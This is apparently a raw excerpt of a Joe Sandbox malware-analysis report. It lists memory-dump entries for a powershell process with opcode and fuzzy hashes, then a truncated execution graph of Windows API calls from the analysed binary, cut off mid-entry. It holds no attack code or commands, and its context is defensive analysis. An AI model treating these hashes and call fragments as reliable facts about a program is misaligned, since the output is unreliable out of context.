                                      • Source File: 00000001.00000002.1764020719.0000000002F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F4D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2f4d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e7a85ade8b00acdcd4346ed4a21f7562da58c27ef82886ac7c3d1755912ef536
                                      • Instruction ID: aba6b6d6b59bf7636ae13c99ca67b6b352863dd83166952d89461f59709035d4
                                      • Opcode Fuzzy Hash: e7a85ade8b00acdcd4346ed4a21f7562da58c27ef82886ac7c3d1755912ef536
                                      • Instruction Fuzzy Hash: 8FF0F976600600AF97208F0AD985C27FBEDEBD4774719C55AE94A8B752C771EC41CAA0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3d25abba125834c21376ec1e737f6bdf65ed87f5917121ff1d34a18068dca124
                                      • Instruction ID: 40fcdbeb85ffcc2aecece19a6c5d03c2ada31d7be3520c63293f942f4ff52e10
                                      • Opcode Fuzzy Hash: 3d25abba125834c21376ec1e737f6bdf65ed87f5917121ff1d34a18068dca124
                                      • Instruction Fuzzy Hash: 34F05E343091408FC3118B2DD494866BBF6AFCA71531911EEE09ACB772DAA1DC02CB50
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ccf2aa8889adb74ef6d679c9f4872dcd23a6d667899d0993bdba6c81fa59114b
                                      • Instruction ID: ab7c1181084b1868320392656148974f3ad21f4d5a52033d0409179b09193071
                                      • Opcode Fuzzy Hash: ccf2aa8889adb74ef6d679c9f4872dcd23a6d667899d0993bdba6c81fa59114b
                                      • Instruction Fuzzy Hash: 88F0B4705093545FC761CF78D498396BFE5EB42310F2444AED68EC7242DB356881C750
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 63e421f5e6ed7ba40b0d6024ab20f0ebf85e2d0197599d3a41c5bac1d366fdaf
                                      • Instruction ID: bf763acd75ffc03ef12de216d48208520ca49b9c3b1bf2b850ecec8e4dd12275
                                      • Opcode Fuzzy Hash: 63e421f5e6ed7ba40b0d6024ab20f0ebf85e2d0197599d3a41c5bac1d366fdaf
                                      • Instruction Fuzzy Hash: C301D271D1074ADBCB04CFE4C8446EDBBB5FF99300F20072EE005A6640EBB02695CB80
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5ea546870438e0f18239b5b124e6b9e1a1bbeae97889981cba093aec4d4f1657
                                      • Instruction ID: deef60ea476c2fa5781a70c81aa2f27aa99728fcf7470e33f14f9400b54f8364
                                      • Opcode Fuzzy Hash: 5ea546870438e0f18239b5b124e6b9e1a1bbeae97889981cba093aec4d4f1657
                                      • Instruction Fuzzy Hash: B4F0E2317006158FDB189B59D884AAF77E6EB8C365710052DE24ED3200CF746C828B50
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 88244166f1c570a98d4d51cfd9d227899588ea448669cb52c374b47252d04d62
                                      • Instruction ID: c655d1ba74212c48b6d335f4139d700eea95cb3ff1648578f6895c8207fee500
                                      • Opcode Fuzzy Hash: 88244166f1c570a98d4d51cfd9d227899588ea448669cb52c374b47252d04d62
                                      • Instruction Fuzzy Hash: 46F0A7317006145FDB149B5AD84496F7BEAEB88665B10052DE24ED3210DF71BD458B94
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1764020719.0000000002F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F4D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2f4d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3d1e4e8d7efa29bb562043cc8ac10464b012f90746afd44449ed83dba4bff44d
                                      • Instruction ID: 64db4ac31238d3cba883d8a92707861e16cbdccf759bca4f32195752c3c867fe
                                      • Opcode Fuzzy Hash: 3d1e4e8d7efa29bb562043cc8ac10464b012f90746afd44449ed83dba4bff44d
                                      • Instruction Fuzzy Hash: 45F0F976500640AFD725CF06DD85D23BBB9EBC5664B198499B84A8B352C771FC42CBA0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8060e3ec2f773ad680e688860294ec29ce16671072e9ec64dd9cdf3a65b654e8
                                      • Instruction ID: 9b7cca28b39d2bcbd800c24a4e970ccebf882b182856b6dcf4237fb21b00ee46
                                      • Opcode Fuzzy Hash: 8060e3ec2f773ad680e688860294ec29ce16671072e9ec64dd9cdf3a65b654e8
                                      • Instruction Fuzzy Hash: 11F0A0397005198FDB01DBA8D840A997BE7EFCC7627144168D649CB354DF34DD028F91
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b0eb02a6edd18c4a8509d3d343dc06deb4f99e18e1114fe91e74fc7d70ad6660
                                      • Instruction ID: 96654ad53f4b03f0db2ca598693b84a0a10d1e1e3e51a4ae064c3c5e79919b64
                                      • Opcode Fuzzy Hash: b0eb02a6edd18c4a8509d3d343dc06deb4f99e18e1114fe91e74fc7d70ad6660
                                      • Instruction Fuzzy Hash: D7F027716041244BE300AB64C4183EB7BA7DFC4358F20816EDA0547398DE792802CBE0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1cd92e715262cf3527f365eb48419ec5e8ed7525418e084b6f4a4dbb947c9c34
                                      • Instruction ID: d36bff9f858bba648c5520818e03492eef8cc3b0483f8ae4884cf6e8adb5ac61
                                      • Opcode Fuzzy Hash: 1cd92e715262cf3527f365eb48419ec5e8ed7525418e084b6f4a4dbb947c9c34
                                      • Instruction Fuzzy Hash: FEF0E53160A7902FC317933D981089F7FA6DEC757131445AEE186CB212CE55DC0A87F6
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 85a1d99831273014b44318a1bac45e97e3bfb42ed8cd717f96c0528e74e840f4
                                      • Instruction ID: 9ce4d119acf8d5775e275f1580dbcf9e52165b054b7fb4172f4748aacac1899d
                                      • Opcode Fuzzy Hash: 85a1d99831273014b44318a1bac45e97e3bfb42ed8cd717f96c0528e74e840f4
                                      • Instruction Fuzzy Hash: 54E0C0123070920A43C422BC441067B558B8FD62F671403BFD555C72C3CC14CC02C371
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bec62f0a43a4019e18887ff48e0d6c31bbae19717fd8599858d21b3492179d17
                                      • Instruction ID: 7f9b15ec21a0c0874316b35d423db86370a97ce83a6cfdc442e1f60a9549ed9c
                                      • Opcode Fuzzy Hash: bec62f0a43a4019e18887ff48e0d6c31bbae19717fd8599858d21b3492179d17
                                      • Instruction Fuzzy Hash: B2E0E5353102148F83109B1ED498C2AB7FBEFCEB2575910AAF54ACB361DA61EC01CB90
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1bd138edd36ee8df28d97aa3e0b6d52526055379dbb4f92364d62a8ff2ffe4ac
                                      • Instruction ID: 7a40abddd426ade1170c94ca1139adab3a8feba623cc611c091a18a4d1c911ad
                                      • Opcode Fuzzy Hash: 1bd138edd36ee8df28d97aa3e0b6d52526055379dbb4f92364d62a8ff2ffe4ac
                                      • Instruction Fuzzy Hash: 87E02B31708040F78B08C26DD4004FAFF72DFCA320F04847ED547E7240CA21682697D0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0fb308c450ec12a2a055a8cef7dd5fad09c325587d20212ad35f68ac38249da0
                                      • Instruction ID: 6428b962141e693599f52f271b230454966ba1b1340fbca852103e7d061bd7d4
                                      • Opcode Fuzzy Hash: 0fb308c450ec12a2a055a8cef7dd5fad09c325587d20212ad35f68ac38249da0
                                      • Instruction Fuzzy Hash: 9EF0A0307092A45BCB0AA77594186AEBF72DBC1724F0401AED64AC7283CFA8080A8796
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ba7d2213353ac0ed3adcfffe764cd11936e47378145baeb4a59496a9645b5c16
                                      • Instruction ID: 26c596da8fbb3f177b40f33b15c861bde2d267b87feef51bf7c00727f1db6aaf
                                      • Opcode Fuzzy Hash: ba7d2213353ac0ed3adcfffe764cd11936e47378145baeb4a59496a9645b5c16
                                      • Instruction Fuzzy Hash: FEE0D82170D2D11A8B16813D64514A6AF738AC722031D85FEE085CF257D8529C478351
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 58ace453cd7140e45a5e3ca8b433cfc014404229857ba35d165a8262fa8be511
                                      • Instruction ID: 739f238de4ab001b860f2f13cf6b9324a053f1551cb26cb4981ff3b56c02ddb0
                                      • Opcode Fuzzy Hash: 58ace453cd7140e45a5e3ca8b433cfc014404229857ba35d165a8262fa8be511
                                      • Instruction Fuzzy Hash: ECF06D709003188BD760DFB8D49839ABBE5EB44310F10446DE64EC3340DF796980CB90
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 58d547af867c0056082de27cd66295801246bb65bbe0c03f6a5cdfc9a8168c88
                                      • Instruction ID: 5e6b8ed569840e9cda3f256b86f41b80e8a5464e2df21d51fb8fc205b66cb2ae
                                      • Opcode Fuzzy Hash: 58d547af867c0056082de27cd66295801246bb65bbe0c03f6a5cdfc9a8168c88
                                      • Instruction Fuzzy Hash: 4BE0863570462897CF0DB775A41C2AEBA5BEBC4729F14006ED60AC3381CFB9590687D9
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3e525a0c0a6a09cb73f4778173e5db7a83d455ea3517f8990039869c7524d252
                                      • Instruction ID: c5538fb2e5e59179f0ac9d865dae45ebe6233bd264fda5d964bbf7bed627c386
                                      • Opcode Fuzzy Hash: 3e525a0c0a6a09cb73f4778173e5db7a83d455ea3517f8990039869c7524d252
                                      • Instruction Fuzzy Hash: CBD05E1230112247169431BA58106BBA1DF8ED95AB705013EEA08D7381ED54EC0153F1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                      • Instruction ID: fff76a13be75614b5ff681de659afd6f0bde099df300741da3ffad7af787b7de
                                      • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                      • Instruction Fuzzy Hash: DEE08631B04018A78B08D59AD4104D9F7A6DBCC220F04847FD90AA7340DA32691687D1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3b09d4c57e2dbb8f452abff748b2e23a8c4202e0a57452342879aee0f91dfe9f
                                      • Instruction ID: 3f75b14a9f99ef6726248bb09661a30d53f1dd9aedb1934847018eb9c83472ff
                                      • Opcode Fuzzy Hash: 3b09d4c57e2dbb8f452abff748b2e23a8c4202e0a57452342879aee0f91dfe9f
                                      • Instruction Fuzzy Hash: 48E0C231B006141B8726662EA81085F7BEBDFC9AB6320883EE10AC7300DF64ED0647E5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5138f69d37f4ad612d774c3ea0d7c6360b9ad46965d0d28fb38f33ca368a2a67
                                      • Instruction ID: d3c00dedb0a7e25b9b5b8026c3298d8220b9658f63f665fc34e7667c6dffdb70
                                      • Opcode Fuzzy Hash: 5138f69d37f4ad612d774c3ea0d7c6360b9ad46965d0d28fb38f33ca368a2a67
                                      • Instruction Fuzzy Hash: C8E04F3190815D9BCF49EBB4D85A4EE7F34EB15301B5044DDDA9782192EA611947CB81
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7395938fc225eecfed852cd6ccc6653aa350993ad615c6d8021454a9755d66fb
                                      • Instruction ID: 4d153c072dcbcb5b81c20d7e1dd84f23c38d61bdf145d23d6a19b60cc9697b19
                                      • Opcode Fuzzy Hash: 7395938fc225eecfed852cd6ccc6653aa350993ad615c6d8021454a9755d66fb
                                      • Instruction Fuzzy Hash: 86E06570C0024AAF8B40DFB9C84226AFFF0AF09200B2080AEC849DB201E6319641CB91
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9fdc3d07e2526ec2a3ceb501d8278d01b165f315beb765dbdf487bc9370c4974
                                      • Instruction ID: b4547eca0ab6810c5f173eee00f9c66693796274daa5e45e3d111eb8d0264ba3
                                      • Opcode Fuzzy Hash: 9fdc3d07e2526ec2a3ceb501d8278d01b165f315beb765dbdf487bc9370c4974
                                      • Instruction Fuzzy Hash: 15E04F30E0928A9BCB59DBB8D44686FBFB1EB46214B2442ADD98AD7203D6311846CF81
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                      • Instruction ID: a53fd4c8a195e5a30fb90ed75c5b83287d687a5d6fd04a9a8cc570e69c540c01
                                      • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                      • Instruction Fuzzy Hash: C5D06270D0420D9F8780DFADC94156DFBF5EB49214F6485AEC919D7341F73156128BD1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8bc44f3e4de3e4391c454e245b4a53b207226b00ec85ba5af19be0d6f1d5b0c0
                                      • Instruction ID: 29d0fe79647321c907698185cb68ad8ddcdec519ec4245bea64e23a43d2c0b64
                                      • Opcode Fuzzy Hash: 8bc44f3e4de3e4391c454e245b4a53b207226b00ec85ba5af19be0d6f1d5b0c0
                                      • Instruction Fuzzy Hash: 94D01734A0420E8B8B48EFA8E45687EBBB6EB45201F1041A9DD09D3340EA306841CBC1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1688cd930c972c35a99895f101dcc18a1223c8fcf7275313035d0e36112d0938
                                      • Instruction ID: 654bc8176bbc471939340cc0a5bc595b9fa72afcca49f4c8cc24ceb1e1268615
                                      • Opcode Fuzzy Hash: 1688cd930c972c35a99895f101dcc18a1223c8fcf7275313035d0e36112d0938
                                      • Instruction Fuzzy Hash: D7D0173080411D8BCF48EBA4E81A4BEBB34FA10302F5001ADD91792191EA702A4ACBC0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 272ea38b5f4cf391f0cd08e46d84915ac80f25e929e8a5eb814af0b2026d8305
                                      • Instruction ID: 533852b4cf0a93b7db3390c29815df2f75e336bce458b74128610170d0a05ad0
                                      • Opcode Fuzzy Hash: 272ea38b5f4cf391f0cd08e46d84915ac80f25e929e8a5eb814af0b2026d8305
                                      • Instruction Fuzzy Hash: 71D01270042706AFC70A5FAF940C4243725EB4170574818EDE58F4B272EA76E941CF54
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 38a571d01c33c0500e7150f295eecfed4bf11ec9493ff4b46a2df6a4c87ac8c9
                                      • Instruction ID: 44af1e1922b95b1707a71ee55365e18a6df6d6824c5c446f959d1df4241b4862
                                      • Opcode Fuzzy Hash: 38a571d01c33c0500e7150f295eecfed4bf11ec9493ff4b46a2df6a4c87ac8c9
                                      • Instruction Fuzzy Hash: B8C012369193919FEF1E8F3088A61267F329B4324130A889AD1828B492CA340808C715
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:

Execution Graph

Execution Coverage: 12.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 17.6%
Total number of Nodes: 2000
Total number of Limit Nodes: 26
CompareStringW 25780->27451 25782->25776 25782->25780 25783 7ff669acecfe GetWindow 25782->25783 25784 7ff669acec7f GetWindowLongPtrW 25782->25784 25783->25776 25783->25782 25784->25783 25785 7ff669acec91 SendMessageW 25784->25785 25785->25783 25786 7ff669acecad GetObjectW 25785->25786 27452 7ff669ac7da8 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25786->27452 25788 7ff669acecc9 27453 7ff669ac7d70 25788->27453 27457 7ff669ac86b0 16 API calls _handle_error 25788->27457 25791 7ff669acece1 SendMessageW DeleteObject 25791->25783 25793 7ff669ab5617 25792->25793 25797 7ff669ab5696 25792->25797 25794 7ff669aa13c4 33 API calls 25793->25794 25795 7ff669ab5632 GetCurrentDirectoryW 25794->25795 25796 7ff669aa20c0 33 API calls 25795->25796 25798 7ff669ab5658 25796->25798 25797->25208 25798->25797 25799 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25798->25799 25800 7ff669ab56ad 25799->25800 25802 7ff669aa2693 25801->25802 25803 7ff669aa2696 SetWindowTextW 25801->25803 25802->25803 25804 7ff669b0e2e8 25803->25804 25805->25220 25807 7ff669aa267f 25806->25807 25808 7ff669aa2682 SetDlgItemTextW 25806->25808 25807->25808 25810 7ff669aa12f4 25809->25810 25817 7ff669aa13ba 25809->25817 25813 7ff669aa132a 25810->25813 25814 7ff669aa13b5 25810->25814 25818 7ff669aa12fa BuildCatchObjectHelperInternal 25810->25818 25816 7ff669ad1c40 4 API calls 25813->25816 25813->25818 27462 7ff669aa1f88 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 25814->27462 25816->25818 27463 7ff669aa200c 33 API calls std::_Xinvalid_argument 25817->27463 25818->25258 27464 7ff669aca644 PeekMessageW 25819->27464 25822 7ff669ace99b SendMessageW SendMessageW 25824 7ff669ace9e1 25822->25824 25825 7ff669ace9fc SendMessageW 25822->25825 25823 7ff669ace94d 25826 7ff669ace959 ShowWindow SendMessageW SendMessageW 25823->25826 25824->25825 25827 7ff669acea1e SendMessageW SendMessageW 25825->25827 25828 7ff669acea1b 25825->25828 25826->25822 25829 7ff669acea70 SendMessageW 
25827->25829 25830 7ff669acea4b SendMessageW 25827->25830 25828->25827 25831 7ff669ad1d90 _handle_error 8 API calls 25829->25831 25830->25829 25832 7ff669acad15 25831->25832 25832->25251 25832->25283 25834 7ff669ab2680 51 API calls 25833->25834 25835 7ff669ab2675 25834->25835 25835->25299 25835->25326 25836->25299 25838 7ff669aa13c4 33 API calls 25837->25838 25839 7ff669ab578d 25838->25839 25840 7ff669ab5790 GetModuleFileNameW 25839->25840 25844 7ff669ab57e0 25839->25844 25841 7ff669ab57e2 25840->25841 25842 7ff669ab57ab 25840->25842 25841->25844 25843 7ff669aa2164 33 API calls 25842->25843 25843->25839 25845 7ff669aa12c0 33 API calls 25844->25845 25847 7ff669ab580c 25845->25847 25846 7ff669ab5844 25846->25374 25847->25846 25848 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25847->25848 25849 7ff669ab5866 25848->25849 25850->25381 27469 7ff669abd098 25851->27469 25855 7ff669aa20e2 25854->25855 25856 7ff669aa20e8 BuildCatchObjectHelperInternal 25855->25856 27503 7ff669aa1490 33 API calls 3 library calls 25855->27503 25856->25398 25858->25412 25859->25424 25860->25435 25861->25442 25862->25449 25863->25478 25864->25486 25865->25500 25866->25378 25867->25392 25868->25415 25869->25340 25870->25359 25872 7ff669aa13c4 33 API calls 25871->25872 25873 7ff669aa25c9 GetWindowTextW 25872->25873 25874 7ff669aa25fe 25873->25874 25875 7ff669aa12c0 33 API calls 25874->25875 25876 7ff669aa260c 25875->25876 25877 7ff669aa2647 25876->25877 25879 7ff669aa266f 25876->25879 25878 7ff669ad1d90 _handle_error 8 API calls 25877->25878 25880 7ff669aa265d 25878->25880 25881 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25879->25881 25880->25272 25882 7ff669aa2674 25881->25882 25884 7ff669ad1d99 25883->25884 25885 7ff669ad1fc0 IsProcessorFeaturePresent 25884->25885 25886 7ff669acbde7 25884->25886 25887 7ff669ad1fd8 25885->25887 27504 7ff669ad21b8 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 25887->27504 25889 7ff669ad1feb 27505 7ff669ad1f80 
SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 25889->27505 27506 7ff669ad678c 31 API calls 3 library calls 25892->27506 25894 7ff669ad686d 27507 7ff669ad6884 16 API calls abort 25894->27507 25897->25414 25898->25465 25899->25474 25900->25499 25901->25517 25902->25519 25903->25531 25931 7ff669ab9d6c 25904->25931 25910 7ff669ab9723 25913 7ff669ab9799 25910->25913 25925 7ff669ab9777 SetDlgItemTextW 25910->25925 25952 7ff669ab8a34 25910->25952 25911 7ff669ab9811 25914 7ff669ab9910 GetSystemMetrics GetWindow 25911->25914 25915 7ff669ab9819 GetWindowLongPtrW 25911->25915 25912 7ff669ab98d3 25912->25914 25956 7ff669ab87e0 25912->25956 25937 7ff669ab8638 25913->25937 25918 7ff669ab9aa6 25914->25918 25928 7ff669ab993d 25914->25928 25916 7ff669b0e2c0 25915->25916 25919 7ff669ab98bb GetWindowRect 25916->25919 25922 7ff669ad1d90 _handle_error 8 API calls 25918->25922 25919->25912 25924 7ff669ab9ab5 25922->25924 25923 7ff669ab9900 SetWindowTextW 25923->25914 25924->25543 25925->25910 25926 7ff669ab9959 GetWindowRect 25965 7ff669aa22c8 25926->25965 25928->25918 25928->25926 25929 7ff669ab9a83 GetWindow 25928->25929 25930 7ff669ab9a29 SendMessageW 25928->25930 25929->25918 25929->25928 25930->25928 25932 7ff669ab9d91 swprintf 25931->25932 25972 7ff669ad9494 25932->25972 25935 7ff669ac055c WideCharToMultiByte 25936 7ff669ac059d 25935->25936 25936->25910 25938 7ff669ab87e0 47 API calls 25937->25938 25942 7ff669ab867f 25938->25942 25939 7ff669ab8790 25940 7ff669ad1d90 _handle_error 8 API calls 25939->25940 25941 7ff669ab87c4 GetWindowRect GetClientRect 25940->25941 25941->25911 25941->25912 25942->25939 25943 7ff669aa12c0 33 API calls 25942->25943 25944 7ff669ab86cf 25943->25944 25945 7ff669aa12c0 33 API calls 25944->25945 25951 7ff669ab87d7 25944->25951 25948 7ff669ab874a 25945->25948 25946 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25947 7ff669ab87dd 25946->25947 25948->25939 25949 7ff669ab87d2 25948->25949 25950 
